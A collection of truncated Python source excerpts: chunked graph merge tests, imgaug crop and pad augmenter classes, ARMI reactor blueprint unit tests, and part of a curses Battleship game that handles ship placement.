new_root_id = new_root_ids[0]
# Check
assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_parent(to_label(cgraph, 1, 0, 0, 0, 1)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 1) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 1))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 0, 0, 0, 1) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_neighboring_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐ ┌─────┬─────┐
│ A¹ │ B¹ │ │ A¹ │ B¹ │
│ 1 │ 2 │ => │ 1━━┿━━2 │
│ │ │ │ │ │
└─────┴─────┘ └─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("<NAME>", [to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 1, 0, 0, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 0, 0, 0, 0) and affinities[0] == np.float32(0.3)
leaves = np.unique(cgraph.get_subgraph_nodes(new_root_id))
assert len(leaves) == 2
assert to_label(cgraph, 1, 0, 0, 0, 0) in leaves
assert to_label(cgraph, 1, 1, 0, 0, 0) in leaves
@pytest.mark.timeout(30)
def test_merge_pair_disconnected_chunks(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (disconnected chunks)
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│ A¹ │ ... │ Z¹ │ │ A¹ │ ... │ Z¹ │
│ 1 │ │ 2 │ => │ 1━━┿━━━━━┿━━2 │
│ │ │ │ │ │ │ │
└─────┘ └─────┘ └─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=9)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk Z
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 127, 127, 127, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0x7F, 0x7F, 0x7F]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(4, np.array([[0x3F, 0x3F, 0x3F]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(5, np.array([[0x1F, 0x1F, 0x1F]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(6, np.array([[0x0F, 0x0F, 0x0F]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(7, np.array([[0x07, 0x07, 0x07]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x00, 0x00, 0x00]]), time_stamp=fake_timestamp)
cgraph.add_layer(8, np.array([[0x03, 0x03, 0x03]]), time_stamp=fake_timestamp)
cgraph.add_layer(9, np.array([[0x00, 0x00, 0x00], [0x01, 0x01, 0x01]]), time_stamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("<NAME>", [to_label(cgraph, 1, 127, 127, 127, 0), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
new_root_id = new_root_ids[0]
# Check
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) == new_root_id
assert cgraph.get_root(to_label(cgraph, 1, 127, 127, 127, 0)) == new_root_id
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert partners[0] == to_label(cgraph, 1, 127, 127, 127, 0) and affinities[0] == np.float32(0.3)
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 127, 127, 127, 0))
assert partners[0] == to_label(cgraph, 1, | |
warning,
but it is still recommended to use `seed` now.
Outdated since 0.4.0.
deterministic : bool, optional
Deprecated since 0.4.0.
See method ``to_deterministic()`` for an alternative and for
details about what the "deterministic mode" actually does.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.CenterPadToMultiplesOf(height_multiple=10, width_multiple=6)
Create an augmenter that pads images to multiples of ``10`` along
the y-axis (i.e. 10, 20, 30, ...) and to multiples of ``6`` along the
x-axis (i.e. 6, 12, 18, ...).
The rows to be padded will be spread *equally* over the top and bottom
sides (analogous for the left/right sides).
"""
# Added in 0.4.0.
def __init__(self, width_multiple, height_multiple,
pad_mode="constant", pad_cval=0,
seed=None, name=None,
random_state="deprecated", deterministic="deprecated"):
super(CenterPadToMultiplesOf, self).__init__(
width_multiple=width_multiple,
height_multiple=height_multiple,
pad_mode=pad_mode,
pad_cval=pad_cval,
position="center",
seed=seed, name=name,
random_state=random_state, deterministic=deterministic)
class CropToPowersOf(CropToFixedSize):
"""Crop images until their height/width is a power of a base.
This augmenter removes pixels from an axis with size ``S`` leading to the
new size ``S'`` until ``S' = B^E`` is fulfilled, where ``B`` is a
provided base (e.g. ``2``) and ``E`` is an exponent from the discrete
interval ``[1 .. inf)``.
.. note::
This augmenter does nothing for axes with size less than ``B^1 = B``.
If you have images with ``S < B^1``, it is recommended
to combine this augmenter with a padding augmenter that pads each
axis up to ``B``.
Added in 0.4.0.
**Supported dtypes**:
See :class:`~imgaug.augmenters.size.CropToFixedSize`.
Parameters
----------
width_base : int or None
Base for the width. Images will be cropped down until their
width fulfills ``width' = width_base ^ E`` with ``E`` being any
natural number.
If ``None``, image widths will not be altered.
height_base : int or None
Base for the height. Images will be cropped down until their
height fulfills ``height' = height_base ^ E`` with ``E`` being any
natural number.
If ``None``, image heights will not be altered.
position : {'uniform', 'normal', 'center', 'left-top', 'left-center', 'left-bottom', 'center-top', 'center-center', 'center-bottom', 'right-top', 'right-center', 'right-bottom'} or tuple of float or StochasticParameter or tuple of StochasticParameter, optional
See :func:`CropToFixedSize.__init__`.
seed : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
name : None or str, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
random_state : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
Old name for parameter `seed`.
Its usage will not yet cause a deprecation warning,
but it is still recommended to use `seed` now.
Outdated since 0.4.0.
deterministic : bool, optional
Deprecated since 0.4.0.
See method ``to_deterministic()`` for an alternative and for
details about what the "deterministic mode" actually does.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.CropToPowersOf(height_base=3, width_base=2)
Create an augmenter that crops each image down to powers of ``3`` along
the y-axis (i.e. 3, 9, 27, ...) and powers of ``2`` along the x-axis (i.e.
2, 4, 8, 16, ...).
The rows to be cropped will be spread *randomly* over the top and bottom
sides (analogous for the left/right sides).
"""
# Added in 0.4.0.
def __init__(self, width_base, height_base, position="uniform",
seed=None, name=None,
random_state="deprecated", deterministic="deprecated"):
super(CropToPowersOf, self).__init__(
width=None, height=None, position=position,
seed=seed, name=name,
random_state=random_state, deterministic=deterministic)
self.width_base = width_base
self.height_base = height_base
# Added in 0.4.0.
def _draw_samples(self, batch, random_state):
_sizes, offset_xs, offset_ys = super(
CropToPowersOf, self
)._draw_samples(batch, random_state)
shapes = batch.get_rowwise_shapes()
sizes = []
for shape in shapes:
height, width = shape[0:2]
croppings = compute_croppings_to_reach_powers_of(
shape,
height_base=self.height_base,
width_base=self.width_base)
# TODO change that
# note that these are not in the same order as shape tuples
# in CropToFixedSize
new_size = (
width - croppings[1] - croppings[3],
height - croppings[0] - croppings[2]
)
sizes.append(new_size)
return sizes, offset_xs, offset_ys
# Added in 0.4.0.
def get_parameters(self):
"""See :func:`~imgaug.augmenters.meta.Augmenter.get_parameters`."""
return [self.width_base, self.height_base, self.position]
class CenterCropToPowersOf(CropToPowersOf):
"""Crop images equally on all sides until H/W is a power of a base.
This is the same as :class:`~imgaug.augmenters.size.CropToPowersOf`, but
uses ``position="center"`` by default, which spreads the crop amounts
equally over all image sides, while
:class:`~imgaug.augmenters.size.CropToPowersOf` by default spreads them
randomly.
Added in 0.4.0.
**Supported dtypes**:
See :class:`~imgaug.augmenters.size.CropToFixedSize`.
Parameters
----------
width_base : int or None
See :func:`CropToPowersOf.__init__`.
height_base : int or None
See :func:`CropToPowersOf.__init__`.
seed : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
name : None or str, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
random_state : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
Old name for parameter `seed`.
Its usage will not yet cause a deprecation warning,
but it is still recommended to use `seed` now.
Outdated since 0.4.0.
deterministic : bool, optional
Deprecated since 0.4.0.
See method ``to_deterministic()`` for an alternative and for
details about what the "deterministic mode" actually does.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.CropToPowersOf(height_base=3, width_base=2)
Create an augmenter that crops each image down to powers of ``3`` along
the y-axis (i.e. 3, 9, 27, ...) and powers of ``2`` along the x-axis (i.e.
2, 4, 8, 16, ...).
The rows to be cropped will be spread *equally* over the top and bottom
sides (analogous for the left/right sides).
"""
# Added in 0.4.0.
def __init__(self, width_base, height_base,
seed=None, name=None,
random_state="deprecated", deterministic="deprecated"):
super(CenterCropToPowersOf, self).__init__(
width_base=width_base, height_base=height_base, position="center",
seed=seed, name=name,
random_state=random_state, deterministic=deterministic)
class PadToPowersOf(PadToFixedSize):
"""Pad images until their height/width is a power of a base.
This augmenter adds pixels to an axis with size ``S`` leading to the
new size ``S'`` until ``S' = B^E`` is fulfilled, where ``B`` is a
provided base (e.g. ``2``) and ``E`` is an exponent from the discrete
interval ``[1 .. inf)``.
Added in 0.4.0.
**Supported dtypes**:
See :class:`~imgaug.augmenters.size.PadToFixedSize`.
Parameters
----------
width_base : int or None
Base for the width. Images will be padded down until their
width fulfills ``width' = width_base ^ E`` with ``E`` being any
natural number.
If ``None``, image widths will not be altered.
height_base : int or None
Base for the height. Images will be padded until their
height fulfills ``height' = height_base ^ E`` with ``E`` being any
natural number.
If ``None``, image heights will not be altered.
pad_mode : imgaug.ALL or str or list of str or imgaug.parameters.StochasticParameter, optional
See :func:`~imgaug.augmenters.size.PadToFixedSize.__init__`.
pad_cval : number or tuple of number or list of number or imgaug.parameters.StochasticParameter, optional
See :func:`~imgaug.augmenters.size.PadToFixedSize.__init__`.
position : {'uniform', 'normal', 'center', 'left-top', 'left-center', 'left-bottom', 'center-top', 'center-center', 'center-bottom', 'right-top', 'right-center', 'right-bottom'} or tuple of float or StochasticParameter or tuple of StochasticParameter, optional
See :func:`PadToFixedSize.__init__`.
seed : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
name : None or str, optional
See :func:`~imgaug.augmenters.meta.Augmenter.__init__`.
random_state : None or int or imgaug.random.RNG or numpy.random.Generator or numpy.random.BitGenerator or numpy.random.SeedSequence or numpy.random.RandomState, optional
Old name for parameter `seed`.
Its usage will not yet cause a deprecation warning,
but it is still recommended to use `seed` now.
Outdated since 0.4.0.
deterministic : bool, optional
Deprecated since 0.4.0.
See method ``to_deterministic()`` for an alternative and for
details about what the "deterministic mode" actually does.
Examples
--------
>>> import imgaug.augmenters as iaa
>>> aug = iaa.PadToPowersOf(height_base=3, width_base=2)
Create an augmenter that pads each image to powers of ``3`` along the
y-axis (i.e. 3, 9, 27, ...) and powers of ``2`` along the x-axis (i.e. 2,
4, 8, 16, ...).
The rows to be padded will be spread *randomly* over the top and bottom
sides (analogous for the left/right sides).
"""
# Added in 0.4.0.
def __init__(self, width_base, height_base,
pad_mode="constant", pad_cval=0,
position="uniform",
seed=None, name=None,
random_state="deprecated", deterministic="deprecated"):
super(PadToPowersOf, self).__init__(
width=None, height=None, pad_mode=pad_mode, pad_cval=pad_cval,
position=position,
seed=seed, name=name,
random_state=random_state, deterministic=deterministic)
self.width_base = width_base
self.height_base = height_base
# Added in 0.4.0.
def _draw_samples(self, batch, random_state):
_sizes, pad_xs, pad_ys, pad_modes, pad_cvals = super(
PadToPowersOf, self
)._draw_samples(batch, random_state)
shapes = batch.get_rowwise_shapes()
sizes = []
for shape in shapes:
height, width = shape[0:2]
paddings = compute_paddings_to_reach_powers_of(
shape,
height_base=self.height_base,
width_base=self.width_base)
# TODO change that
# note that these are not in the same | |
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the blueprints (loading input) file"""
import os
import pathlib
import unittest
import yamlize
from armi.reactor import blueprints
from armi.reactor import parameters
from armi.reactor.flags import Flags
from armi.nucDirectory.elements import bySymbol
from armi import settings
from armi.tests import TEST_ROOT
from armi.utils import directoryChangers
from armi.utils import textProcessors
from armi.reactor.blueprints.isotopicOptions import NuclideFlags, CustomIsotopics
from armi.reactor.blueprints.componentBlueprint import ComponentBlueprint
class TestBlueprints(unittest.TestCase):
"""Test that the basic functionality of faithfully receiving user input to construct
ARMI data model objects works as expected.
Values are hopefully not hardcoded in here, just sanity checks that nothing messed
up as this is code has VERY high incidental coverage from other tests.
NOTE: as it stands it seems a little hard to test more granularity with the
blueprints file as each initialization is intended to be a complete load from the
input file, and each load also
makes calls out to the reactor for some assembly initialization steps.
TODO: see the above note, and try to test blueprints on a wider range of input
files, touching on each failure case.
"""
@classmethod
def setUpClass(cls):
cls.cs = settings.Settings()
cls.directoryChanger = directoryChangers.DirectoryChanger(TEST_ROOT)
cls.directoryChanger.open()
y = textProcessors.resolveMarkupInclusions(
pathlib.Path(os.getcwd()) / "refSmallReactor.yaml"
)
cls.blueprints = blueprints.Blueprints.load(y)
cls.blueprints._prepConstruction(cls.cs)
@classmethod
def tearDownClass(cls):
cls.directoryChanger.close()
def test_nuclides(self):
"""Tests the available sets of nuclides work as expected"""
actives = set(self.blueprints.activeNuclides)
inerts = set(self.blueprints.inertNuclides)
self.assertEqual(
actives.union(inerts), set(self.blueprints.allNuclidesInProblem)
)
self.assertEqual(actives.intersection(inerts), set())
def test_getAssemblyTypeBySpecifier(self):
aDesign = self.blueprints.assemDesigns.bySpecifier["IC"]
self.assertEqual(aDesign.name, "igniter fuel")
self.assertEqual(aDesign.specifier, "IC")
def test_specialIsotopicVectors(self):
mox = self.blueprints.customIsotopics["MOX"]
allNucsInProblem = set(self.blueprints.allNuclidesInProblem)
for a in mox.keys():
self.assertIn(a, allNucsInProblem)
self.assertIn("U235", mox)
self.assertAlmostEqual(mox["PU239"], 0.00286038)
def test_componentDimensions(self):
fuelAssem = self.blueprints.constructAssem(self.cs, name="igniter fuel")
fuel = fuelAssem.getComponents(Flags.FUEL)[0]
self.assertAlmostEqual(fuel.getDimension("od", cold=True), 0.86602)
self.assertAlmostEqual(fuel.getDimension("id", cold=True), 0.0)
self.assertAlmostEqual(fuel.getDimension("od"), 0.87763665, 4)
self.assertAlmostEqual(fuel.getDimension("id"), 0.0)
self.assertAlmostEqual(fuel.getDimension("mult"), 169)
def test_traceNuclides(self):
"""Ensure that armi.reactor.blueprints.componentBlueprint._insertDepletableNuclideKeys runs."""
fuel = (
self.blueprints.constructAssem(self.cs, "igniter fuel")
.getFirstBlock(Flags.FUEL)
.getComponent(Flags.FUEL)
)
self.assertIn("AM241", fuel.getNuclides())
self.assertLess(fuel.getNumberDensity("AM241"), 1e-5)
class TestBlueprintsSchema(unittest.TestCase):
"""Test the blueprint schema checks"""
yamlString = r"""blocks:
fuel: &block_fuel
fuel: &component_fuel_fuel
shape: Hexagon
material: UZr
Tinput: 25.0
Thot: 600.0
ip: 0.0
mult: 1.0
op: 10.0
components:
freefuel:
shape: Sphere
material: UZr
Tinput: 25.0
Thot: 600.0
id: 0.0
mult: 1.0
od: 11.0
assemblies:
fuel a: &assembly_a
specifier: IC
blocks: [*block_fuel]
height: [1.0]
axial mesh points: [1]
xs types: [A]
fuel b:
<<: *assembly_a
fuelVent: True
hotChannelFactors: Reactor
grids:
pins:
geom: cartesian
lattice map: |
2 2 2 2 2
2 1 1 1 2
2 1 3 1 2
2 3 1 1 2
2 2 2 2 2
"""
def test_assemblyParameters(self):
cs = settings.Settings()
design = blueprints.Blueprints.load(self.yamlString)
fa = design.constructAssem(cs, name="fuel a")
fb = design.constructAssem(cs, name="fuel b")
for paramDef in fa.p.paramDefs.inCategory(
parameters.Category.assignInBlueprints
):
# Semantics of __iter__() and items() is different now in the parameter
# system. Since we aren't using __slots__ anymore, we use the parameter
# definitions (which have a global-ish sense of `assigned`ness), so we can't
# tell, per-object, whether they've been set.
self.assertEqual(paramDef.default, fa.p[paramDef.name])
self.assertIn(paramDef.name, fb.p)
self.assertFalse(fa.p.fuelVent)
self.assertEqual(fa.p.hotChannelFactors, "Default")
self.assertTrue(fb.p.fuelVent)
self.assertEqual(fb.p.hotChannelFactors, "Reactor")
def test_nuclidesMc2v2(self):
"""Tests that ZR is not expanded to its isotopics for this setting.."""
cs = settings.Settings()
newSettings = {"xsKernel": "MC2v2"}
cs = cs.modified(newSettings=newSettings)
design = blueprints.Blueprints.load(self.yamlString)
design._prepConstruction(cs)
self.assertTrue(
set({"U238", "U235", "ZR"}).issubset(set(design.allNuclidesInProblem))
)
assem = design.constructAssem(cs, name="fuel a")
self.assertTrue(
set(assem.getNuclides()).issubset(set(design.allNuclidesInProblem))
)
def test_nuclidesMc2v3(self):
"""Tests that ZR is expanded to its isotopics for MC2v3."""
cs = settings.Settings()
newSettings = {"xsKernel": "MC2v3"}
cs = cs.modified(newSettings=newSettings)
design = blueprints.Blueprints.load(self.yamlString)
design._prepConstruction(cs)
# 93 and 95 are not naturally occurring.
zrNucs = {"ZR" + str(A) for A in range(90, 97)} - {"ZR93", "ZR95"}
self.assertTrue(
set({"U238", "U235"} | zrNucs).issubset(set(design.allNuclidesInProblem))
)
self.assertTrue(zrNucs.issubset(set(design.inertNuclides)))
assem = design.constructAssem(cs, name="fuel a")
# the assembly won't get non-naturally occurring nuclides
unnaturalZr = (
n.name for n in bySymbol["ZR"].nuclideBases if n.abundance == 0.0
)
designNucs = set(design.allNuclidesInProblem).difference(unnaturalZr)
self.assertTrue(set(assem.getNuclides()).issubset(designNucs))
def test_merge(self):
yamlString = r"""
nuclide flags:
B10: {burn: true, xs: true}
B11: {burn: true, xs: true}
DUMP1: {burn: true, xs: true}
FE: {burn: true, xs: true}
NI: {burn: true, xs: true}
C: {burn: true, xs: true}
MO: {burn: true, xs: true}
SI: {burn: true, xs: true}
CR: {burn: true, xs: true}
MN: {burn: true, xs: true}
NA: {burn: true, xs: true}
V: {burn: true, xs: true}
W: {burn: true, xs: true}
blocks:
nomerge block: &unmerged_block
A: &comp_a
shape: Circle
material: B4C
Tinput: 50.0
Thot: 500.0
id: 0.0
mult: 1
od: .5
Gap1: &comp_gap
shape: Circle
material: Void
Tinput: 50.0
Thot: 500.0
id: A.od
mult: 1
od: B.id
B: &gcomp_b
shape: Circle
material: HT9
Tinput: 20.0
Thot: 600.0
id: .5
mult: 1
od: .75
Gap2: &comp_gap2
shape: Circle
material: Void
Tinput: 50.0
Thot: 500.0
id: B.od
mult: 1
od: Clad.id
Clad: &comp_clad
shape: Circle
material: HT9
Tinput: 20.0
Thot: 700.0
id: .75
mult: 1
od: 1.0
coolant: &comp_coolant
shape: DerivedShape
material: Sodium
Tinput: 600.0
Thot: 600.0
duct: &comp_duct
shape: Hexagon
material: HT9
Tinput: 20.0
Thot: 500.0
ip: 1.2
mult: 1
op: 1.4
intercoolant: &comp_intercoolant
shape: Hexagon
material: Sodium
Tinput: 500.0
Thot: 500.0
ip: duct.op
mult: 1
op: 1.6
merge block: &merged_block
A:
<<: *comp_a
mergeWith: Clad
Gap1: *comp_gap
B:
<<: *gcomp_b
mergeWith: Clad
Gap2: *comp_gap2
Clad: *comp_clad
coolant: *comp_coolant
duct: *comp_duct
intercoolant: *comp_intercoolant
assemblies:
a: &assembly_a
specifier: IC
blocks: [*merged_block, *unmerged_block]
height: [1.0, 1.0]
axial mesh points: [1, 1]
xs types: [A, A]
"""
bp = blueprints.Blueprints.load(yamlString)
a = bp.constructAssem(settings.Settings(), name="a")
mergedBlock, unmergedBlock = a
self.assertNotIn("A", mergedBlock.getComponentNames())
self.assertNotIn("B", mergedBlock.getComponentNames())
self.assertEqual(len(mergedBlock) + 4, len(unmergedBlock))
self.assertAlmostEqual(
sum(c.getArea() for c in mergedBlock),
sum(c.getArea() for c in unmergedBlock),
)
mergedNucs, unmergedNucs = (
mergedBlock.getNumberDensities(),
unmergedBlock.getNumberDensities(),
)
errorMessage = ""
for nucName in set(unmergedNucs) | set(mergedNucs):
n1, n2 = unmergedNucs[nucName], mergedNucs[nucName]
try:
self.assertAlmostEqual(n1, n2)
except AssertionError:
errorMessage += "\nnuc {} not equal. unmerged: {} merged: {}".format(
nucName, n1, n2
)
self.assertTrue(not errorMessage, errorMessage)
self.assertAlmostEqual(mergedBlock.getMass(), unmergedBlock.getMass())
def test_nuclideFlags(self):
with self.assertRaises(yamlize.YamlizingError):
NuclideFlags.load("{potato: {burn: true, xs: true}}")
with self.assertRaises(yamlize.YamlizingError):
NuclideFlags.load("{U238: {burn: 12, xs: 0}}")
def test_customIsotopics(self):
with self.assertRaises(yamlize.YamlizingError):
CustomIsotopics.load("MOX: {input format: applesauce}")
with self.assertRaises(yamlize.YamlizingError):
CustomIsotopics.load("MOX: {input format: number densities, density: -0.1}")
with self.assertRaises(yamlize.YamlizingError):
CustomIsotopics.load(
"MOX: {input format: number densities, density: 1.5, FAKENUC234: 0.000286}"
)
def test_components(self):
bads = [
{
"shape": "potato",
"name": "name",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
},
{"shape": "Circle", "name": "name", "Tinput": 1.0, "Thot": 1.0},
{"shape": "circle", "name": "name", "material": "HT9", "Thot": 1.0},
{"shape": "circle", "name": "name", "material": "HT9", "Tinput": 1.0},
{
"shape": "circle",
"name": "name",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
"mergeWith": 6,
},
{
"shape": "circle",
"name": "name",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
"isotopics": 4,
},
{
"shape": "circle",
"name": "name",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
5: "od",
},
{
"shape": "circle",
"name": "name",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
"mult": "potato,mult",
},
]
for bad in bads:
with self.assertRaises(yamlize.YamlizingError):
ComponentBlueprint.load(repr(bad))
def test_cladding_invalid(self):
"""Make sure cladding input components are flagged as invalid."""
bad = {
"name": "cladding",
"shape": "Circle",
"material": "HT9",
"Tinput": 1.0,
"Thot": 1.0,
}
with self.assertRaises(yamlize.YamlizingError):
ComponentBlueprint.load(repr(bad))
def test_withoutBlocks(self):
# Some projects use a script to generate an input that has completely unique blocks,
# so the blocks: section is not needed
yamlWithoutBlocks = """
nuclide flags:
U238: {burn: true, xs: true}
U235: {burn: true, xs: true}
LFP35: {burn: true, xs: true}
U236: {burn: true, xs: true}
PU239: {burn: true, xs: true}
DUMP2: {burn: true, xs: true}
DUMP1: {burn: true, xs: true}
NP237: {burn: true, xs: true}
PU238: {burn: true, xs: true}
PU236: {burn: true, xs: true}
LFP39: {burn: true, xs: true}
PU238: {burn: true, xs: true}
LFP40: {burn: true, xs: true}
PU241: {burn: true, xs: true}
LFP38: {burn: true, xs: true}
U234: {burn: true, xs: true}
AM241: {burn: true, xs: true}
LFP41: {burn: true, xs: true}
PU242: {burn: true, xs: true}
AM243: {burn: true, xs: true}
CM244: | |
that was allowed.')
screen.refresh()
wait()
elif xc >= 8 and yc >= 8:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up or left: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'left':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc >= 8 and yc <= 1:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter down or left: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'down' and zc != 'left':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
else:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, down, left, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'down' and zc != 'left' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
wait()
if zc == 'up':
yc2 = yc - 1
yc3 = yc - 2
if player_board[yc][xc] == 'O' and player_board[yc2][xc] == 'O' and player_board[yc3][xc] == 'O':
player_board[yc][xc] = '3'
player_board[yc2][xc] = '3'
player_board[yc3][xc] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
elif zc == 'down':
yc2 = yc + 1
yc3 = yc + 2
if player_board[yc][xc] == 'O' and player_board[yc2][xc] == 'O' and player_board[yc3][xc] == 'O':
player_board[yc][xc] = '3'
player_board[yc2][xc] = '3'
player_board[yc3][xc] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
elif zc == 'right':
xc2 = xc + 1
xc3 = xc + 2
if player_board[yc][xc] == 'O' and player_board[yc][xc2] == 'O' and player_board[yc][xc3] == 'O':
player_board[yc][xc] = '3'
player_board[yc][xc2] = '3'
player_board[yc][xc3] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
else:
xc2 = xc - 1
xc3 = xc - 2
if player_board[yc][xc] == 'O' and player_board[yc][xc2] == 'O' and player_board[yc][xc3] == 'O':
player_board[yc][xc] = '3'
player_board[yc][xc2] = '3'
player_board[yc][xc3] = '3'
break
else:
screen.addstr('Your coordinates for this ship are colliding with the coordinates for another ship. Please re-enter the coordinates carefully and pick a direction which won\'t collide with another ship.')
wait()
continue
screen.clear()
wait()
def make_player_ship4():
screen.clear()
screen.refresh()
screen.addstr(0, 0, 'Now we will generate your fourth ship. Please answer the following questions correctly, because if your answer doesn\'t meet our set requirements, the question will be asked again.\n')
screen.refresh()
wait()
while True:
while True:
try:
screen.clear()
prompt_str = 'Where do you want the first x coordinate of this ship to be? Enter a number between 0 to 9: '
l = len(prompt_str)
